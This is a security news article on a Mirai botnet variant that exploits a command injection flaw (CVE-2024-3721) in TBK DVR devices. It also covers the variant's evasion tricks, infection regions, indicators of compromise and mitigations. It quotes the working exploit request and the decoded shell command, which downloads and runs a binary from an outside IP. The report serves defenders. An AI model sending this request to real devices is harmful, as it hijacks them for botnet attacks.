%20(1).webp?w=696&resize=696,0&ssl=1 "New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution")
The latest wave of Mirai botnet activity has resurfaced with a refined attack chain exploiting CVE-2024-3721, a critical command injection vulnerability in TBK DVR-4104 and DVR-4216 devices.
This campaign leverages unpatched firmware to deploy a modified Mirai variant designed for IoT device hijacking and DDoS operations.
Exploitation Vector & Payload Delivery
Attackers exploit the vulnerability via crafted HTTP POST requests targeting the /device.rsp endpoint.
.png
)
The injected command downloads and executes an ARM32 binary:
textPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
The decoded shell script executes:
bashcd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk
This streamlined payload skips architecture reconnaissance, specifically targeting ARM32-based DVR systems.
Malware Modifications & Evasion Tactics
The Mirai variant incorporates several upgrades:
1. RC4 String Encryption
- Uses XOR-encrypted RC4 key:
6e7976666525a97639777d2d7f303177 - Decrypted strings stored in a custom
DataDecryptedstructure for runtime access
2. Anti-Analysis Checks
- Scans
/proc/[PID]/cmdlinefor VMware/QEMU indicators - Validates execution path against hardcoded directories: text
/dev/shm /tmp /var/run
3. Process Whitelisting
Terminates competing malware processes like Hajime, Anarchy, and Mozi to monopolize device resources.
Infection Metrics & Mitigation
Telemetry data reveals concentrated infections in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil.
Over 50,000 exposed DVR devices remain vulnerable globally, with attackers actively scanning Shodan-listed targets.
| Mitigation Strategy | Implementation |
|---|---|
| Firmware Patching | Apply TBK’s 20240412+ updates |
| Network Segmentation | Isolate DVRs from critical infrastructure |
| Input Sanitization | Block special characters in mdb/mdc parameters |
Kaspersky products detect this variant as HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.
Device owners should prioritize firmware updates and consider factory resets for compromised units.
Indicators of Compromise
textIPs: 116.203.104[.]203, 130.61.64[.]122, 161.97.219[.]84
MD5: 011a406e89e603e93640b10325ebbdc8, 24fd043f9175680d0c061b28a2801dfc
This campaign underscores the persistent threat of legacy IoT vulnerabilities in industrial surveillance systems.
The Mirai codebase’s continued evolution demonstrates threat actors’ ability to weaponize decade-old malware through strategic modifications.
To Upgrade Your Cybersecurity Skills, Take Diamond Membership With 150+ Practical Cybersecurity Courses Online – Enroll Here
%20(1).webp?w=1200&resize=1200,0&ssl=1&description=This campaign leverages unpatched firmware to deploy a modified Mirai variant designed for IoT device hijacking and DDoS operations.){kind=link}